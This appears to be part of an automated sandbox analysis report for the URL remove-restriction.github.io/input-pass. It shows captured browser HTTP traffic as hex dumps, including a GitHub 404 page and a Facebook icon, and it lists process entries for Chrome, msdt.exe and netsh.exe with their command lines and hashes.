2025-02-06 00:42:06 UTC	2988	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 45 00 00 01 45 08 03 00 00 00 4c aa 0f 6f 00 00 01 2c 50 4c 54 45 00 00 00 08 68 ff 05 65 ff 0a 66 ff 08 65 ff 08 66 ff 09 67 ff 08 67 ff 07 66 ff 08 67 ff 09 66 ff 08 66 ff 08 68 ff 10 70 ff 07 65 ff 07 65 ff 08 65 ff 08 66 ff 08 66 ff 06 66 ff 08 66 ff 07 67 ff 08 69 ff 07 66 ff 10 60 ff 07 66 ff 07 66 ff 08 65 ff 08 66 ff 07 66 ff 08 66 ff 07 66 ff 08 67 ff 09 66 ff 08 67 ff 08 64 ff 09 65 ff 06 67 ff 07 66 ff 07 65 ff 09 66 ff 00 60 ff 07 66 ff 06 63 ff 07 67 ff 0b 65 ff 09 66 ff 09 65 ff 08 64 ff 08 68 ff 14 72 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fe fe ff ff ff ff ff ff ff ff ff ff ff ff ff e0 ec ff 65 9f ff ef f5 ff d0 e3 ff 55 Data Ascii: PNGIHDREELo,PLTEhefefggfgffhpeeeffffgif`ffeffffgfgdegfef`fcgefedhreU

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49750	185.199.108.153	443	6036	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-02-06 00:42:07 UTC	634	OUT	GET /input-pass/favicon.ico HTTP/1.1 Host: remove-restriction.github.io Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://remove-restriction.github.io/input-pass/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-02-06 00:42:07 UTC	753	IN	HTTP/1.1 404 Not Found Connection: close Content-Length: 9379 Server: GitHub.com Content-Type: text/html; charset=utf-8 permissions-policy: interest-cohort=() x-origin-cache: HIT Access-Control-Allow-Origin: * Strict-Transport-Security: max-age=31556952 ETag: "64d39a40-24a3" Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; img-src data:; connect-src 'self' x-proxy-cache: MISS X-GitHub-Request-Id: E826:C95D3:D6B60B:EC31FE:67A4055E Accept-Ranges: bytes Age: 0 Date: Thu, 06 Feb 2025 00:42:07 GMT Via: 1.1 varnish X-Served-By: cache-ewr-kewr1740066-EWR X-Cache: MISS X-Cache-Hits: 0 X-Timer: S1738802528.528647,VS0,VE13 Vary: Accept-Encoding X-Fastly-Request-ID: ba02ae0a8d92da966f8213e478af6ff0891fa3e6
2025-02-06 00:42:07 UTC	1378	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 22 20 63 6f 6e 74 65 6e 74 3d 22 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 73 74 79 6c 65 2d 73 72 63 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 3b 20 69 6d 67 2d 73 72 63 20 64 61 74 61 3a 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 50 Data Ascii: <!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Content-Security-Policy" content="default-src 'none'; style-src 'unsafe-inline'; img-src data:; connect-src 'self'"> <title>P
2025-02-06 00:42:07 UTC	1378	IN	Data Raw: 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 20 32 29 2c 0a 20 20 20 20 20 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 20 31 39 32 64 70 69 29 2c 0a 20 20 20 20 20 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 20 32 64 70 70 78 29 20 7b 0a 20 20 20 20 20 20 20 20 2e 6c 6f 67 6f 2d 69 6d 67 2d 31 78 20 7b 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 20 7d 0a 20 20 20 20 20 20 20 20 2e 6c 6f 67 6f 2d 69 6d 67 2d 32 78 20 7b 20 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 20 7d 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 23 73 75 Data Ascii: ice-pixel-ratio: 2), only screen and ( min-resolution: 192dpi), only screen and ( min-resolution: 2dppx) { .logo-img-1x { display: none; } .logo-img-2x { display: inline-block; } } #su
2025-02-06 00:42:07 UTC	1378	IN	Data Raw: 32 22 20 68 65 69 67 68 74 3d 22 33 32 22 20 74 69 74 6c 65 3d 22 22 20 61 6c 74 3d 22 22 20 73 72 63 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 70 6e 67 3b 62 61 73 65 36 34 2c 69 56 42 4f 52 77 30 4b 47 67 6f 41 41 41 41 4e 53 55 68 45 55 67 41 41 41 43 41 41 41 41 41 67 43 41 59 41 41 41 42 7a 65 6e 72 30 41 41 41 41 47 58 52 46 57 48 52 54 62 32 5a 30 64 32 46 79 5a 51 42 42 5a 47 39 69 5a 53 42 4a 62 57 46 6e 5a 56 4a 6c 59 57 52 35 63 63 6c 6c 50 41 41 41 41 79 52 70 56 46 68 30 57 45 31 4d 4f 6d 4e 76 62 53 35 68 5a 47 39 69 5a 53 35 34 62 58 41 41 41 41 41 41 41 44 77 2f 65 48 42 68 59 32 74 6c 64 43 42 69 5a 57 64 70 62 6a 30 69 37 37 75 2f 49 69 42 70 5a 44 30 69 56 7a 56 4e 4d 45 31 77 51 32 56 6f 61 55 68 36 63 6d 56 54 65 6b 35 55 59 33 70 72 59 Data Ascii: 2" height="32" title="" alt="" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAAAyRpVFh0WE1MOmNvbS5hZG9iZS54bXAAAAAAADw/eHBhY2tldCBiZWdpbj0i77u/IiBpZD0iVzVNME1wQ2VoaUh6cmVTek5UY3prY
2025-02-06 00:42:07 UTC	1378	IN	Data Raw: 2f 38 37 37 47 59 64 48 52 67 33 5a 6a 4d 58 46 78 65 70 51 4b 4e 53 36 73 4c 43 77 4a 78 71 4e 4e 75 46 70 69 4d 66 6a 56 73 34 5a 6a 55 61 2f 70 6d 6d 6a 65 44 36 56 6c 4a 53 38 4e 70 76 4e 54 34 51 51 37 6d 78 77 6a 53 73 4a 69 45 51 69 6d 2f 31 2b 2f 39 6c 67 4d 48 67 49 72 35 6f 68 75 78 47 31 57 43 77 39 56 71 76 31 63 6c 46 52 30 64 43 71 42 4f 44 45 6c 56 36 76 39 30 6f 67 45 44 6a 47 64 59 62 56 6a 58 68 70 61 65 6e 64 69 6f 71 4b 30 37 43 49 52 37 5a 41 71 45 34 39 50 54 30 39 42 50 4c 32 50 4d 67 54 42 79 51 47 73 59 69 5a 6c 51 44 34 75 4d 58 74 64 72 2b 4a 78 57 49 4e 68 67 49 4e 59 68 47 54 32 4d 73 4b 67 4d 72 6d 32 64 6e 5a 58 67 52 58 68 61 48 41 67 35 6a 45 4a 6f 64 55 41 48 78 75 78 34 4c 75 64 48 4a 45 39 52 64 45 64 41 2b 69 33 4a 75 Data Ascii: /877GYdHRg3ZjMXFxepQKNS6sLCwJxqNNuFpiMfjVs4ZjUa/pmmjeD6VlJS8NpvNT4QQ7mxwjSsJiEQim/1+/9lgMHgIr5ohuxG1WCw9Vqv1clFR0dCqBODElV6v90ogEDjGdYbVjXhpaendioqK07CIR7ZAqE49PT09BPL2PMgTByQGsYiZlQD4uMXtdr+JxWINhgINYhGT2MsKgMrm2dnZXgRXhaHAg5jEJodUAHxux4LudHJE9RdEdA+i3Ju
2025-02-06 00:42:07 UTC	1378	IN	Data Raw: 52 77 30 4b 47 67 6f 41 41 41 41 4e 53 55 68 45 55 67 41 41 41 45 41 41 41 41 42 41 43 41 59 41 41 41 43 71 61 58 48 65 41 41 41 41 47 58 52 46 57 48 52 54 62 32 5a 30 64 32 46 79 5a 51 42 42 5a 47 39 69 5a 53 42 4a 62 57 46 6e 5a 56 4a 6c 59 57 52 35 63 63 6c 6c 50 41 41 41 41 79 52 70 56 46 68 30 57 45 31 4d 4f 6d 4e 76 62 53 35 68 5a 47 39 69 5a 53 35 34 62 58 41 41 41 41 41 41 41 44 77 2f 65 48 42 68 59 32 74 6c 64 43 42 69 5a 57 64 70 62 6a 30 69 37 37 75 2f 49 69 42 70 5a 44 30 69 56 7a 56 4e 4d 45 31 77 51 32 56 6f 61 55 68 36 63 6d 56 54 65 6b 35 55 59 33 70 72 59 7a 6c 6b 49 6a 38 2b 49 44 78 34 4f 6e 68 74 63 47 31 6c 64 47 45 67 65 47 31 73 62 6e 4d 36 65 44 30 69 59 57 52 76 59 6d 55 36 62 6e 4d 36 62 57 56 30 59 53 38 69 49 48 67 36 65 47 31 Data Ascii: Rw0KGgoAAAANSUhEUgAAAEAAAABACAYAAACqaXHeAAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAAAyRpVFh0WE1MOmNvbS5hZG9iZS54bXAAAAAAADw/eHBhY2tldCBiZWdpbj0i77u/IiBpZD0iVzVNME1wQ2VoaUh6cmVTek5UY3prYzlkIj8+IDx4OnhtcG1ldGEgeG1sbnM6eD0iYWRvYmU6bnM6bWV0YS8iIHg6eG1
2025-02-06 00:42:07 UTC	1378	IN	Data Raw: 62 74 34 6d 65 73 56 6d 73 57 64 31 71 53 70 48 68 64 58 64 32 66 75 50 2f 41 66 63 70 75 74 35 2f 41 38 38 78 77 79 6d 63 64 42 67 4c 71 65 6e 70 36 46 75 52 79 75 57 56 34 7a 75 2f 76 37 35 39 51 79 57 42 6a 78 6f 7a 35 74 37 36 2b 2f 67 75 6e 30 39 6d 4b 35 78 46 79 61 6b 6f 43 41 50 53 61 54 43 61 7a 4e 70 76 4e 50 6f 59 56 62 68 36 4f 31 59 4b 47 52 46 30 75 31 33 73 4e 44 51 32 37 51 4d 7a 66 70 69 41 41 4b 6a 30 6c 6e 55 36 2f 67 42 56 66 41 5a 57 32 57 57 70 77 77 56 7a 79 30 49 67 50 33 47 37 33 46 70 6a 49 36 52 45 68 41 47 41 39 71 56 52 71 41 31 62 39 6d 56 6f 42 56 79 49 43 32 74 44 69 38 58 67 32 34 2b 64 55 7a 51 69 41 62 53 2f 73 37 4f 78 38 47 32 6f 2f 33 6d 4b 43 43 2b 5a 77 30 65 66 7a 50 51 45 66 63 56 6a 59 72 41 52 58 33 64 62 56 31 Data Ascii: bt4mesVmsWd1qSpHhdXd2fuP/Afcput5/A88xwymcdBgLqenp6FuRyuWV4zu/v759QyWBjxoz5t76+/gun09mK5xFyakoCAPSaTCazNpvNPoYVbh6O1YKGRF0u13sNDQ27QMzfpiAAKj0lnU6/gBVfAZW2WWpwwVzy0IgP3G73FpjI6REhAGA9qVRqA1b9mVoBVyIC2tDi8Xg24+dUzQiAbS/s7Ox8G2o/3mKCC+Zw0efzPQEfcVjYrARX3dbV1
2025-02-06 00:42:07 UTC	1111	IN	Data Raw: 50 41 4b 48 4c 45 37 52 64 77 75 59 4a 5a 6d 4e 77 7a 79 43 4d 6b 42 43 59 79 4b 52 4f 4a 42 4d 4a 6c 39 42 2f 50 58 58 43 6a 6a 6d 43 6d 44 4f 56 7a 48 33 66 69 50 70 4f 62 45 57 47 71 6f 4b 65 34 45 42 6c 38 76 31 68 6c 71 73 64 4c 76 64 32 33 6d 6b 78 48 4d 39 70 63 39 6b 4d 70 6d 6e 6f 39 48 6f 65 54 69 69 37 65 77 62 48 45 5a 50 50 78 31 7a 74 4c 53 31 74 56 33 41 6e 47 75 4d 6a 69 4e 6a 76 62 51 46 75 48 77 36 7a 44 6f 35 42 79 37 64 54 50 41 51 4e 42 67 4d 4c 72 52 61 72 54 6b 53 6c 73 31 6d 6e 77 54 37 75 77 70 39 76 69 72 78 39 51 7a 62 57 2f 48 75 56 2f 6a 35 64 2f 62 2b 36 6a 6e 69 4b 6c 6c 6c 50 38 6c 6b 65 4f 4e 4a 44 6b 2b 64 71 39 47 73 51 54 6e 43 34 66 42 31 68 65 4f 30 4b 34 37 48 77 65 37 57 64 44 72 39 6e 41 4b 67 58 77 4f 42 77 48 49 Data Ascii: PAKHLE7RdwuYJZmNwzyCMkBCYyKROJBMJl9B/PXXCjjmCmDOVzH3fiPpObEWGqoKe4EBl8v1hlqsdLvd23mkxHM9pc9kMpmno9HoeTii7ewbHEZPPx1ztLS1tV3AnGuMjiNjvbQFuHw6zDo5By7dTPAQNBgMLrRarTkSls1mnwT7uwp9virx9QzbW/HuV/j5d/b+6jniKlllP8lkeONJDk+dq9GsQTnC4fB1heO0K47Hwe7WdDr9nAKgXwOBwHI

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49751	157.240.253.35	443	6036	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-02-06 00:42:07 UTC	366	OUT	GET /images/fb_icon_325x325.png HTTP/1.1 Host: www.facebook.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-02-06 00:42:08 UTC	1196	IN	HTTP/1.1 200 OK Content-Type: image/png Access-Control-Allow-Origin: * content-md5: d/aqJ+1Jz8Ok1Z9NYiYbVg== Edge-Control: cache-maxage=86400s Expires: Fri, 07 Feb 2025 00:19:58 GMT Cache-Control: public,max-age=86400 reporting-endpoints: coop_report="https://www.facebook.com/browser_reporting/coop/?minimize=0", coep_report="https://www.facebook.com/browser_reporting/coep/?minimize=0", default="https://www.facebook.com/ajax/browser_error_reports/?device_level=unknown&brsid=7468094281784808175", permissions_policy="https://www.facebook.com/ajax/browser_error_reports/" report-to: {"max_age":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":86400,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coep\/?minimize=0"}],"group":"coep_report"}, {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown&brsid=7468094281784808175"}]}, {"max_age":21600,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"} document-policy: force-load-at-top
2025-02-06 00:42:08 UTC	1488	IN	Data Raw: 70 65 72 6d 69 73 73 69 6f 6e 73 2d 70 6f 6c 69 63 79 3a 20 61 63 63 65 6c 65 72 6f 6d 65 74 65 72 3d 28 29 2c 20 61 74 74 72 69 62 75 74 69 6f 6e 2d 72 65 70 6f 72 74 69 6e 67 3d 28 73 65 6c 66 29 2c 20 61 75 74 6f 70 6c 61 79 3d 28 29 2c 20 62 6c 75 65 74 6f 6f 74 68 3d 28 29 2c 20 62 72 6f 77 73 69 6e 67 2d 74 6f 70 69 63 73 3d 28 73 65 6c 66 29 2c 20 63 61 6d 65 72 61 3d 28 73 65 6c 66 29 2c 20 63 68 2d 64 65 76 69 63 65 2d 6d 65 6d 6f 72 79 3d 28 29 2c 20 63 68 2d 64 6f 77 6e 6c 69 6e 6b 3d 28 29 2c 20 63 68 2d 64 70 72 3d 28 29 2c 20 63 68 2d 65 63 74 3d 28 29 2c 20 63 68 2d 72 74 74 3d 28 29 2c 20 63 68 2d 73 61 76 65 2d 64 61 74 61 3d 28 29 2c 20 63 68 2d 75 61 2d 61 72 63 68 3d 28 29 2c 20 63 68 2d 75 61 2d 62 69 74 6e 65 73 73 3d 28 29 2c 20 63 Data Ascii: permissions-policy: accelerometer=(), attribution-reporting=(self), autoplay=(), bluetooth=(), browsing-topics=(self), camera=(self), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), c
2025-02-06 00:42:08 UTC	2988	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 45 00 00 01 45 08 03 00 00 00 4c aa 0f 6f 00 00 01 2c 50 4c 54 45 00 00 00 08 68 ff 05 65 ff 0a 66 ff 08 65 ff 08 66 ff 09 67 ff 08 67 ff 07 66 ff 08 67 ff 09 66 ff 08 66 ff 08 68 ff 10 70 ff 07 65 ff 07 65 ff 08 65 ff 08 66 ff 08 66 ff 06 66 ff 08 66 ff 07 67 ff 08 69 ff 07 66 ff 10 60 ff 07 66 ff 07 66 ff 08 65 ff 08 66 ff 07 66 ff 08 66 ff 07 66 ff 08 67 ff 09 66 ff 08 67 ff 08 64 ff 09 65 ff 06 67 ff 07 66 ff 07 65 ff 09 66 ff 00 60 ff 07 66 ff 06 63 ff 07 67 ff 0b 65 ff 09 66 ff 09 65 ff 08 64 ff 08 68 ff 14 72 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fe fe ff ff ff ff ff ff ff ff ff ff ff ff ff e0 ec ff 65 9f ff ef f5 ff d0 e3 ff 55 Data Ascii: PNGIHDREELo,PLTEhefefggfgffhpeeeffffgif`ffeffffgfgdegfef`fcgefedhreU

Statistics

CPU Usage

• chrome.exe
• chrome.exe
• chrome.exe
• msdt.exe
• netsh.exe

Click to jump to process

Memory Usage

• chrome.exe
• chrome.exe
• chrome.exe
• msdt.exe
• netsh.exe

Click to jump to process

High Level Behavior Distribution

• File
• Registry

Click to dive into process behavior distribution

Behavior

• chrome.exe
• chrome.exe
• chrome.exe
• msdt.exe
• netsh.exe

Click to jump to process

System Behavior

Analysis Process: chrome.exePID: 5472, Parent PID: 5496

General

Target ID:	0
Start time:	19:41:53
Start date:	05/02/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

File Activities

File Opened

Show Windows behavior

Registry Activities

There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

Show Windows behavior

Process Activities

Process Created

Process Terminated

Show Windows behavior

Thread Activities

There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

Show Windows behavior

Memory Activities

Memory Usage Statistics

Show Windows behavior

Timing Activities

There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

Show Windows behavior

Windows UI Activities

There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

Show Windows behavior

Process Token Activities

Token Adjusted

Show Windows behavior

Chronological Activities

Analysis Process: chrome.exePID: 6036, Parent PID: 5472

General

Target ID:	2
Start time:	19:41:57
Start date:	05/02/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2516 --field-trial-handle=2444,i,5468127952651942022,16810805013983279297,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

File Activities

File Opened

Show Windows behavior

Thread Activities

There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

Show Windows behavior

Memory Activities

Memory Usage Statistics

Show Windows behavior

Chronological Activities

Analysis Process: chrome.exePID: 6560, Parent PID: 5496

General

Target ID:	3
Start time:	19:42:03
Start date:	05/02/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" "http://remove-restriction.github.io/input-pass"
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

File Activities

There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

Show Windows behavior

Process Activities

There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

Show Windows behavior

Chronological Activities

Analysis Process: msdt.exePID: 6428, Parent PID: 5472

General

Target ID:	7
Start time:	19:42:33
Start date:	05/02/2025
Path:	C:\Windows\System32\msdt.exe
Wow64 process (32bit):	false
Commandline:	-modal "262222" -skip TRUE -path "C:\Windows\diagnostics\system\networking" -af "C:\Users\user\AppData\Local\Temp\NDF2684.tmp" -ep "NetworkDiagnosticsWeb"
Imagebase:	0x7ff7b8120000
File size:	499'200 bytes
MD5 hash:	3AE6BFDF0257B303EDD695DA183C8462
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

File Activities

File Created

File Attributes Queried

Show Windows behavior

Section Activities

Sections loaded by Windows

Sections loaded by Program

Show Windows behavior

Registry Activities

Key Opened

Show Windows behavior

COM Activities

There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

Show Windows behavior

Mutex Activities

There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

Show Windows behavior

Process Activities

There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

Show Windows behavior

Thread Activities

Thread Created

Thread Information Set

Show Windows behavior

Memory Activities

Memory Usage Statistics

Show Windows behavior

System Activities

There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

Show Windows behavior

Timing Activities

There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

Show Windows behavior

Windows UI Activities

Window UI Enumerated

Message Posted to Windows UI

Show Windows behavior

Object Security Activities

There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

Show Windows behavior

LPC Port Activities

There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

Show Windows behavior

Chronological Activities

Analysis Process: netsh.exePID: 6252, Parent PID: 5228

General

Target ID:	10
Start time:	19:42:37
Start date:	05/02/2025
Path:	C:\Windows\System32\netsh.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\netsh.exe" trace diagnose Scenario=NetworkSnapshot Mode=NetTroubleshooter
Imagebase:	0x7ff627a20000
File size:	96'768 bytes
MD5 hash:	6F1E6DD688818BC3D1391D0CC7D597EB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

File Activities

File Written

Show Windows behavior

Section Activities

Sections loaded by Windows

Sections loaded by Program

Show Windows behavior

Registry Activities

There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

Show Windows behavior

Mutex Activities

There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

Show Windows behavior

Process Activities

There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

Show Windows behavior

Thread Activities

Thread Information Set

Show Windows behavior

Memory Activities

Memory Usage Statistics

Show Windows behavior

System Activities

There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

Show Windows behavior

Windows UI Activities

There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

Show Windows behavior

LPC Port Activities

There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

Show Windows behavior

Chronological Activities

Disassembly

⊘No disassembly